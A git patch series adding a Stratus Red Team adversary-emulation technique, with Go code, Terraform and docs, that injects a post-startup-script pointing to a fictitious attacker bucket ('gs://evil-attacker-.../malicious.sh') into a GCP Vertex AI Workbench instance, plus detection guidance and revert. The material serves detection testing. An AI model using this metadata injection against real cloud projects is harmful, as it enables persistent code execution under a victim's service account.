From faa093fcebfd5c6b74411a28ca23cf52ad8b84aa Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Simon=20Mar=C3=A9chal?= Date: Thu, 26 Mar 2026 15:02:25 +0100 Subject: [PATCH 1/5] New attack technique: Inject a Malicious Startup Script into a Vertex AI Workbench Instance (gcp.execution.modify-vertex-notebook-startup) Co-Authored-By: Claude Sonnet 4.6 --- ...xecution.modify-vertex-notebook-startup.md | 65 ++++++ docs/attack-techniques/list.md | 1 + .../modify-vertex-notebook-startup/main.go | 190 ++++++++++++++++++ .../modify-vertex-notebook-startup/main.tf | 56 ++++++ v2/internal/attacktechniques/main.go | 1 + 5 files changed, 313 insertions(+) create mode 100755 docs/attack-techniques/GCP/gcp.execution.modify-vertex-notebook-startup.md create mode 100644 v2/internal/attacktechniques/gcp/execution/modify-vertex-notebook-startup/main.go create mode 100644 v2/internal/attacktechniques/gcp/execution/modify-vertex-notebook-startup/main.tf diff --git a/docs/attack-techniques/GCP/gcp.execution.modify-vertex-notebook-startup.md b/docs/attack-techniques/GCP/gcp.execution.modify-vertex-notebook-startup.md new file mode 100755 index 000000000..1f81310bc --- /dev/null +++ b/docs/attack-techniques/GCP/gcp.execution.modify-vertex-notebook-startup.md @@ -0,0 +1,65 @@ +--- +title: Inject a Malicious Startup Script into a Vertex AI Workbench Instance +--- + +# Inject a Malicious Startup Script into a Vertex AI Workbench Instance + + slow + + +Platform: GCP + +## Mappings + +- MITRE ATT&CK + - Execution + - Privilege Escalation + + + +## Description + + +Modifies a Vertex AI Workbench (user-managed notebook) instance to execute a +remote script on the next start by injecting a malicious URL into the instance's +post-startup-script metadata field. An attacker with +notebooks.instances.update permission can use this technique to +achieve persistent code execution inside the notebook environment, run under +the instance's service account identity. + +Warm-up: + +- Create a Vertex AI Workbench instance (e2-standard-2, us-central1-a) + +Detonation: + +- Patch the Workbench instance's GCE setup metadata to set + post-startup-script to a fictitious attacker-controlled GCS URI + (gs://evil-attacker-<project-id>-<random>/malicious.sh) + +Revert: + +- Remove the post-startup-script metadata key from the instance + +References: + +- https://cloud.google.com/vertex-ai/docs/workbench/user-managed/manage-notebooks-introduction +- https://cloud.google.com/vertex-ai/docs/workbench/reference/rest/v2/projects.locations.instances/patch + + +## Instructions + +```bash title="Detonate with Stratus Red Team" +stratus detonate gcp.execution.modify-vertex-notebook-startup +``` +## Detection + + +Identify when a Vertex AI Workbench instance's metadata is modified by monitoring +for google.cloud.notebooks.v2.NotebookService.UpdateInstance events in +GCP Admin Activity audit logs. Alert when the post-startup-script or +startup-script metadata fields are added or changed to external URLs, +which may indicate an attempt to establish persistent code execution in the notebook +environment. + + diff --git a/docs/attack-techniques/list.md b/docs/attack-techniques/list.md index eeabd9d19..07a91b3a9 100755 --- a/docs/attack-techniques/list.md +++ b/docs/attack-techniques/list.md @@ -102,4 +102,5 @@ This page contains the list of all Stratus Attack Techniques. | [Impersonate GCP Service Accounts](./GCP/gcp.privilege-escalation.impersonate-service-accounts.md) | [GCP](./GCP/index.md) | Privilege Escalation | | [Delete a GCP Log Sink](./GCP/gcp.defense-evasion.delete-logging-sink.md) | [GCP](./GCP/index.md) | Defense Evasion | | [Disable a GCP Log Sink](./GCP/gcp.defense-evasion.disable-logging-sink.md) | [GCP](./GCP/index.md) | Defense Evasion | +| [Inject a Malicious Startup Script into a Vertex AI Workbench Instance](./GCP/gcp.execution.modify-vertex-notebook-startup.md) | [GCP](./GCP/index.md) | Execution, Privilege Escalation | | [Reduce Log Retention Period on a Cloud Logging Sink Bucket](./GCP/gcp.defense-evasion.reduce-sink-log-retention.md) | [GCP](./GCP/index.md) | Defense Evasion | diff --git a/v2/internal/attacktechniques/gcp/execution/modify-vertex-notebook-startup/main.go b/v2/internal/attacktechniques/gcp/execution/modify-vertex-notebook-startup/main.go new file mode 100644 index 000000000..c861dacd4 --- /dev/null +++ b/v2/internal/attacktechniques/gcp/execution/modify-vertex-notebook-startup/main.go @@ -0,0 +1,190 @@ +package gcp + +import ( + "context" + "crypto/rand" + _ "embed" + "encoding/hex" + "fmt" + "log" + "maps" + "time" + + "github.com/datadog/stratus-red-team/v2/pkg/stratus" + "github.com/datadog/stratus-red-team/v2/pkg/stratus/mitreattack" + notebooks "google.golang.org/api/notebooks/v2" +) + +//go:embed main.tf +var tf []byte + +func init() { + stratus.GetRegistry().RegisterAttackTechnique(&stratus.AttackTechnique{ + ID: "gcp.execution.modify-vertex-notebook-startup", + FriendlyName: "Inject a Malicious Startup Script into a Vertex AI Workbench Instance", + Description: ` +Modifies a Vertex AI Workbench (user-managed notebook) instance to execute a +remote script on the next start by injecting a malicious URL into the instance's +post-startup-script metadata field. An attacker with +notebooks.instances.update permission can use this technique to +achieve persistent code execution inside the notebook environment, run under +the instance's service account identity. + +Warm-up: + +- Create a Vertex AI Workbench instance (e2-standard-2, us-central1-a) + +Detonation: + +- Patch the Workbench instance's GCE setup metadata to set + post-startup-script to a fictitious attacker-controlled GCS URI + (gs://evil-attacker-<project-id>-<random>/malicious.sh) + +Revert: + +- Remove the post-startup-script metadata key from the instance + +References: + +- https://cloud.google.com/vertex-ai/docs/workbench/user-managed/manage-notebooks-introduction +- https://cloud.google.com/vertex-ai/docs/workbench/reference/rest/v2/projects.locations.instances/patch +`, + Detection: ` +Identify when a Vertex AI Workbench instance's metadata is modified by monitoring +for google.cloud.notebooks.v2.NotebookService.UpdateInstance events in +GCP Admin Activity audit logs. Alert when the post-startup-script or +startup-script metadata fields are added or changed to external URLs, +which may indicate an attempt to establish persistent code execution in the notebook +environment. +`, + Platform: stratus.GCP, + IsIdempotent: false, + IsSlow: true, + MitreAttackTactics: []mitreattack.Tactic{mitreattack.Execution, mitreattack.PrivilegeEscalation}, + PrerequisitesTerraformCode: tf, + Detonate: detonate, + Revert: revert, + }) +} + +func newNotebooksService(ctx context.Context, providers stratus.CloudProviders) (*notebooks.Service, error) { + svc, err := notebooks.NewService(ctx, providers.GCP().Options()) + if err != nil { + return nil, fmt.Errorf("failed to create Notebooks client: %w", err) + } + return svc, nil +} + +func instancePath(projectId, location, instanceName string) string { + return fmt.Sprintf("projects/%s/locations/%s/instances/%s", projectId, location, instanceName) +} + +// waitForNotebooksOperation polls a Notebooks long-running operation until it +// completes or the maximum number of attempts is reached. +func waitForNotebooksOperation(ctx context.Context, svc *notebooks.Service, opName string) error { + const maxAttempts = 60 + const pollInterval = 10 * time.Second + + for attempt := range maxAttempts { + op, err := svc.Projects.Locations.Operations.Get(opName).Context(ctx).Do() + if err != nil { + return fmt.Errorf("failed to poll Notebooks operation %s: %w", opName, err) + } + if op.Done { + if op.Error != nil { + return fmt.Errorf("Notebooks operation %s failed: %s", opName, op.Error.Message) + } + return nil + } + log.Printf("Waiting for Notebooks patch operation to complete (attempt %d/%d)\n", attempt+1, maxAttempts) + time.Sleep(pollInterval) + } + return fmt.Errorf("Notebooks operation %s did not complete after %d attempts", opName, maxAttempts) +} + +func setPostStartupScript(ctx context.Context, svc *notebooks.Service, projectId, location, instanceName, scriptURL string) error { + path := instancePath(projectId, location, instanceName) + + // Fetch the current instance to preserve any existing GCE setup fields. + instance, err := svc.Projects.Locations.Instances.Get(path).Context(ctx).Do() + if err != nil { + return fmt.Errorf("failed to get Workbench instance %s: %w", path, err) + } + + // Preserve existing metadata and inject / remove the post-startup-script key. + metadata := make(map[string]string) + if instance.GceSetup != nil && instance.GceSetup.Metadata != nil { + maps.Copy(metadata, instance.GceSetup.Metadata) + } + + if scriptURL == "" { + delete(metadata, "post-startup-script") + } else { + metadata["post-startup-script"] = scriptURL + } + + patchedGceSetup := ¬ebooks.GceSetup{ + Metadata: metadata, + } + + op, err := svc.Projects.Locations.Instances.Patch(path, ¬ebooks.Instance{ + GceSetup: patchedGceSetup, + }).UpdateMask("gceSetup.metadata").Context(ctx).Do() + if err != nil { + return fmt.Errorf("failed to patch Workbench instance %s: %w", path, err) + } + + return waitForNotebooksOperation(ctx, svc, op.Name) +} + +func detonate(params map[string]string, providers stratus.CloudProviders) error { + gcp := providers.GCP() + projectId := gcp.GetProjectId() + instanceName := params["instance_name"] + location := params["location"] + ctx := context.Background() + + svc, err := newNotebooksService(ctx, providers) + if err != nil { + return err + } + + // The post-startup-script field only accepts gs:// URIs — the script is fetched + // from GCS when the instance boots, so GCP does not validate the bucket exists at + // patch time. Using a fictitious attacker-controlled bucket simulates the attack. + // GCS bucket names are globally unique, so a random suffix is added to the project + // ID to prevent a third party from pre-registering the bucket name. + var nonce [4]byte + if _, err = rand.Read(nonce[:]); err != nil { + return fmt.Errorf("failed to generate random nonce: %w", err) + } + maliciousURL := fmt.Sprintf("gs://evil-attacker-%s-%s/malicious.sh", projectId, hex.EncodeToString(nonce[:])) + log.Printf("Injecting post-startup-script %s into Workbench instance %s\n", maliciousURL, instanceName) + if err = setPostStartupScript(ctx, svc, projectId, location, instanceName, maliciousURL); err != nil { + return err + } + + log.Printf("Successfully injected malicious startup script into Workbench instance %s — script will execute on next start\n", instanceName) + return nil +} + +func revert(params map[string]string, providers stratus.CloudProviders) error { + gcp := providers.GCP() + projectId := gcp.GetProjectId() + instanceName := params["instance_name"] + location := params["location"] + ctx := context.Background() + + svc, err := newNotebooksService(ctx, providers) + if err != nil { + return err + } + + log.Printf("Removing post-startup-script from Workbench instance %s\n", instanceName) + if err = setPostStartupScript(ctx, svc, projectId, location, instanceName, ""); err != nil { + return err + } + + log.Printf("Successfully removed malicious startup script from Workbench instance %s\n", instanceName) + return nil +} diff --git a/v2/internal/attacktechniques/gcp/execution/modify-vertex-notebook-startup/main.tf b/v2/internal/attacktechniques/gcp/execution/modify-vertex-notebook-startup/main.tf new file mode 100644 index 000000000..7a1d53c2b --- /dev/null +++ b/v2/internal/attacktechniques/gcp/execution/modify-vertex-notebook-startup/main.tf @@ -0,0 +1,56 @@ +terraform { + required_providers { + google = { + source = "hashicorp/google" + version = "~> 6.18.1" + } + random = { + source = "hashicorp/random" + version = "~> 3.3.2" + } + } +} + +locals { + resource_prefix = "stratus-red-team-mvns" # modify vertex notebook startup +} + +resource "random_string" "suffix" { + length = 8 + special = false + min_lower = 8 +} + +resource "google_compute_network" "vpc" { + name = "${local.resource_prefix}-vpc-${random_string.suffix.result}" + auto_create_subnetworks = true +} + +resource "google_workbench_instance" "notebook" { + name = "${local.resource_prefix}-${random_string.suffix.result}" + location = "us-central1-a" + + gce_setup { + machine_type = "e2-standard-2" + + boot_disk { + disk_size_gb = 150 + } + + network_interfaces { + network = google_compute_network.vpc.self_link + } + } +} + +output "instance_name" { + value = google_workbench_instance.notebook.name +} + +output "location" { + value = google_workbench_instance.notebook.location +} + +output "display" { + value = format("Vertex AI Workbench instance %s in %s ready", google_workbench_instance.notebook.name, google_workbench_instance.notebook.location) +} diff --git a/v2/internal/attacktechniques/main.go b/v2/internal/attacktechniques/main.go index b8b5d05fb..23b16719a 100644 --- a/v2/internal/attacktechniques/main.go +++ b/v2/internal/attacktechniques/main.go @@ -75,6 +75,7 @@ import ( _ "github.com/datadog/stratus-red-team/v2/internal/attacktechniques/gcp/discovery/download-instance-metadata" _ "github.com/datadog/stratus-red-team/v2/internal/attacktechniques/gcp/discovery/enumerate-permissions" _ "github.com/datadog/stratus-red-team/v2/internal/attacktechniques/gcp/execution/modify-gce-startup-script" + _ "github.com/datadog/stratus-red-team/v2/internal/attacktechniques/gcp/execution/modify-vertex-notebook-startup" _ "github.com/datadog/stratus-red-team/v2/internal/attacktechniques/gcp/exfiltration/share-compute-disk" _ "github.com/datadog/stratus-red-team/v2/internal/attacktechniques/gcp/exfiltration/share-compute-image" _ "github.com/datadog/stratus-red-team/v2/internal/attacktechniques/gcp/exfiltration/share-compute-snapshot" From 5c6f5bfeab57b44665d0bc85db0dd618d6b0909c Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Simon=20Mar=C3=A9chal?= Date: Mon, 30 Mar 2026 14:42:47 +0200 Subject: [PATCH 2/5] Add external references for technique documentation Co-Authored-By: Claude Opus 4.6 (1M context) --- .../gcp/execution/modify-vertex-notebook-startup/main.go | 2 ++ 1 file changed, 2 insertions(+) diff --git a/v2/internal/attacktechniques/gcp/execution/modify-vertex-notebook-startup/main.go b/v2/internal/attacktechniques/gcp/execution/modify-vertex-notebook-startup/main.go index c861dacd4..18b64cc30 100644 --- a/v2/internal/attacktechniques/gcp/execution/modify-vertex-notebook-startup/main.go +++ b/v2/internal/attacktechniques/gcp/execution/modify-vertex-notebook-startup/main.go @@ -48,6 +48,8 @@ References: - https://cloud.google.com/vertex-ai/docs/workbench/user-managed/manage-notebooks-introduction - https://cloud.google.com/vertex-ai/docs/workbench/reference/rest/v2/projects.locations.instances/patch +- https://sra.io/blog/privilege-escalation-in-aws-and-gcp-machine-learning-instances/ +- https://unit42.paloaltonetworks.com/privilege-escalation-llm-model-exfil-vertex-ai/ `, Detection: ` Identify when a Vertex AI Workbench instance's metadata is modified by monitoring From 2889bcd2bf6d84d5ee83a812aa190d7d1a94ee13 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Simon=20Mar=C3=A9chal?= Date: Wed, 1 Apr 2026 10:42:09 +0200 Subject: [PATCH 3/5] Address PR feedback: remove HackTricks refs, regenerate docs Co-Authored-By: Claude Opus 4.6 (1M context) --- ...p.execution.modify-vertex-notebook-startup.md | 2 ++ docs/attack-techniques/GCP/index.md | 4 ++++ .../mitre-attack-coverage-matrices.md | 4 ++-- docs/index.yaml | 16 ++++++++++++++++ 4 files changed, 24 insertions(+), 2 deletions(-) diff --git a/docs/attack-techniques/GCP/gcp.execution.modify-vertex-notebook-startup.md b/docs/attack-techniques/GCP/gcp.execution.modify-vertex-notebook-startup.md index 1f81310bc..0bc776fd8 100755 --- a/docs/attack-techniques/GCP/gcp.execution.modify-vertex-notebook-startup.md +++ b/docs/attack-techniques/GCP/gcp.execution.modify-vertex-notebook-startup.md @@ -45,6 +45,8 @@ References: - https://cloud.google.com/vertex-ai/docs/workbench/user-managed/manage-notebooks-introduction - https://cloud.google.com/vertex-ai/docs/workbench/reference/rest/v2/projects.locations.instances/patch +- https://sra.io/blog/privilege-escalation-in-aws-and-gcp-machine-learning-instances/ +- https://unit42.paloaltonetworks.com/privilege-escalation-llm-model-exfil-vertex-ai/ ## Instructions diff --git a/docs/attack-techniques/GCP/index.md b/docs/attack-techniques/GCP/index.md index e27caff02..195bca875 100755 --- a/docs/attack-techniques/GCP/index.md +++ b/docs/attack-techniques/GCP/index.md @@ -13,6 +13,8 @@ Note that some Stratus attack techniques may correspond to more than a single AT - [Modify a GCE Instance Startup Script](./gcp.execution.modify-gce-startup-script.md) + - [Inject a Malicious Startup Script into a Vertex AI Workbench Instance](./gcp.execution.modify-vertex-notebook-startup.md) + ## Persistence @@ -37,6 +39,8 @@ Note that some Stratus attack techniques may correspond to more than a single AT - [Impersonate GCP Service Accounts](./gcp.privilege-escalation.impersonate-service-accounts.md) + - [Inject a Malicious Startup Script into a Vertex AI Workbench Instance](./gcp.execution.modify-vertex-notebook-startup.md) + ## Defense Evasion diff --git a/docs/attack-techniques/mitre-attack-coverage-matrices.md b/docs/attack-techniques/mitre-attack-coverage-matrices.md index ba4217835..d4e954f47 100644 --- a/docs/attack-techniques/mitre-attack-coverage-matrices.md +++ b/docs/attack-techniques/mitre-attack-coverage-matrices.md @@ -56,10 +56,10 @@ This provides coverage matrices of MITRE ATT&CK tactics and techniques currently Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementExfiltrationImpact Steal and Use the GCE Default Service Account Token from Outside Google CloudModify a GCE Instance Startup ScriptRegister SSH public key to instance metadataModify a GCE Instance Startup ScriptDelete a Cloud DNS Logging PolicyRetrieve a High Number of Secret Manager secretsRead GCE Instance Metadata via the Compute APIRegister SSH public key to instance metadataExfiltrate Compute Disk by sharing itCreate a GCE GPU Virtual Machine -Backdoor a GCP Service Account through its IAM PolicyCreate an Admin GCP Service AccountDisable Data Access Audit Logs for a GCP ServiceSteal and Use the GCE Default Service Account Token from Outside Google CloudEnumerate Permissions of a GCP Service AccountExfiltrate Compute Image by sharing itCreate GCE Instances in Multiple Zones +Inject a Malicious Startup Script into a Vertex AI Workbench InstanceBackdoor a GCP Service Account through its IAM PolicyCreate an Admin GCP Service AccountDisable Data Access Audit Logs for a GCP ServiceSteal and Use the GCE Default Service Account Token from Outside Google CloudEnumerate Permissions of a GCP Service AccountExfiltrate Compute Image by sharing itCreate GCE Instances in Multiple Zones Create an Admin GCP Service AccountCreate a GCP Service Account KeyAttempt to Remove a GCP Project from its OrganizationExfiltrate Compute Disk by sharing a snapshot Create a GCP Service Account KeyImpersonate GCP Service AccountsDisable VPC Flow Logs on a Subnet -Invite an External User to a GCP ProjectDelete a GCP Log Sink +Invite an External User to a GCP ProjectInject a Malicious Startup Script into a Vertex AI Workbench InstanceDelete a GCP Log Sink Disable a GCP Log Sink Reduce Log Retention Period on a Cloud Logging Sink Bucket diff --git a/docs/index.yaml b/docs/index.yaml index 86eb701da..662bbc3e8 100644 --- a/docs/index.yaml +++ b/docs/index.yaml @@ -626,6 +626,14 @@ GCP: - Privilege Escalation platform: GCP isIdempotent: true + - id: gcp.execution.modify-vertex-notebook-startup + name: Inject a Malicious Startup Script into a Vertex AI Workbench Instance + isSlow: true + mitreAttackTactics: + - Execution + - Privilege Escalation + platform: GCP + isIdempotent: false Exfiltration: - id: gcp.exfiltration.share-compute-disk name: Exfiltrate Compute Disk by sharing it @@ -752,6 +760,14 @@ GCP: - Privilege Escalation platform: GCP isIdempotent: true + - id: gcp.execution.modify-vertex-notebook-startup + name: Inject a Malicious Startup Script into a Vertex AI Workbench Instance + isSlow: true + mitreAttackTactics: + - Execution + - Privilege Escalation + platform: GCP + isIdempotent: false Azure: Execution: - id: azure.execution.vm-custom-script-extension From 7fb4cae082f86a66539aa9115905b24257742620 Mon Sep 17 00:00:00 2001 From: Christophe Tafani-Dereeper Date: Thu, 30 Apr 2026 14:24:04 +0200 Subject: [PATCH 4/5] Document Notebooks API requirement for Vertex Workbench technique Address PR feedback: warm-up fails with a 403 when notebooks.googleapis.com is not enabled. Add a note in the technique description so users know to enable the API beforehand. --- .../GCP/gcp.execution.modify-vertex-notebook-startup.md | 2 ++ .../gcp/execution/modify-vertex-notebook-startup/main.go | 2 ++ 2 files changed, 4 insertions(+) diff --git a/docs/attack-techniques/GCP/gcp.execution.modify-vertex-notebook-startup.md b/docs/attack-techniques/GCP/gcp.execution.modify-vertex-notebook-startup.md index 0bc776fd8..9f8179397 100755 --- a/docs/attack-techniques/GCP/gcp.execution.modify-vertex-notebook-startup.md +++ b/docs/attack-techniques/GCP/gcp.execution.modify-vertex-notebook-startup.md @@ -31,6 +31,8 @@ the instance's service account identity. - Create a Vertex AI Workbench instance (e2-standard-2, us-central1-a) +Note: This technique requires the Notebooks API (notebooks.googleapis.com) to be enabled in your GCP project. If it is not enabled, the warm-up will fail with a 403 error pointing to the API enablement page. + Detonation: - Patch the Workbench instance's GCE setup metadata to set diff --git a/v2/internal/attacktechniques/gcp/execution/modify-vertex-notebook-startup/main.go b/v2/internal/attacktechniques/gcp/execution/modify-vertex-notebook-startup/main.go index 18b64cc30..bb218402e 100644 --- a/v2/internal/attacktechniques/gcp/execution/modify-vertex-notebook-startup/main.go +++ b/v2/internal/attacktechniques/gcp/execution/modify-vertex-notebook-startup/main.go @@ -34,6 +34,8 @@ Warm-up: - Create a Vertex AI Workbench instance (e2-standard-2, us-central1-a) +Note: This technique requires the Notebooks API (notebooks.googleapis.com) to be enabled in your GCP project. If it is not enabled, the warm-up will fail with a 403 error pointing to the API enablement page. + Detonation: - Patch the Workbench instance's GCE setup metadata to set From 95b3b0d4f7f6d40ce82b2079b238b710da09e8ef Mon Sep 17 00:00:00 2001 From: Christophe Tafani-Dereeper Date: Thu, 30 Apr 2026 14:27:52 +0200 Subject: [PATCH 5/5] Regenerate docs/index.yaml after merge Re-run `make docs` to incorporate the base branch's idempotency update for modify-gce-startup-script while preserving the modify-vertex-notebook-startup entry from this branch. --- docs/index.yaml | 16 ++++++++++++++++ 1 file changed, 16 insertions(+) diff --git a/docs/index.yaml b/docs/index.yaml index 2e363df7e..bdc978d6d 100644 --- a/docs/index.yaml +++ b/docs/index.yaml @@ -626,6 +626,14 @@ GCP: - Privilege Escalation platform: GCP isIdempotent: false + - id: gcp.execution.modify-vertex-notebook-startup + name: Inject a Malicious Startup Script into a Vertex AI Workbench Instance + isSlow: true + mitreAttackTactics: + - Execution + - Privilege Escalation + platform: GCP + isIdempotent: false Exfiltration: - id: gcp.exfiltration.share-compute-disk name: Exfiltrate Compute Disk by sharing it @@ -752,6 +760,14 @@ GCP: - Privilege Escalation platform: GCP isIdempotent: true + - id: gcp.execution.modify-vertex-notebook-startup + name: Inject a Malicious Startup Script into a Vertex AI Workbench Instance + isSlow: true + mitreAttackTactics: + - Execution + - Privilege Escalation + platform: GCP + isIdempotent: false Azure: Execution: - id: azure.execution.vm-custom-script-extension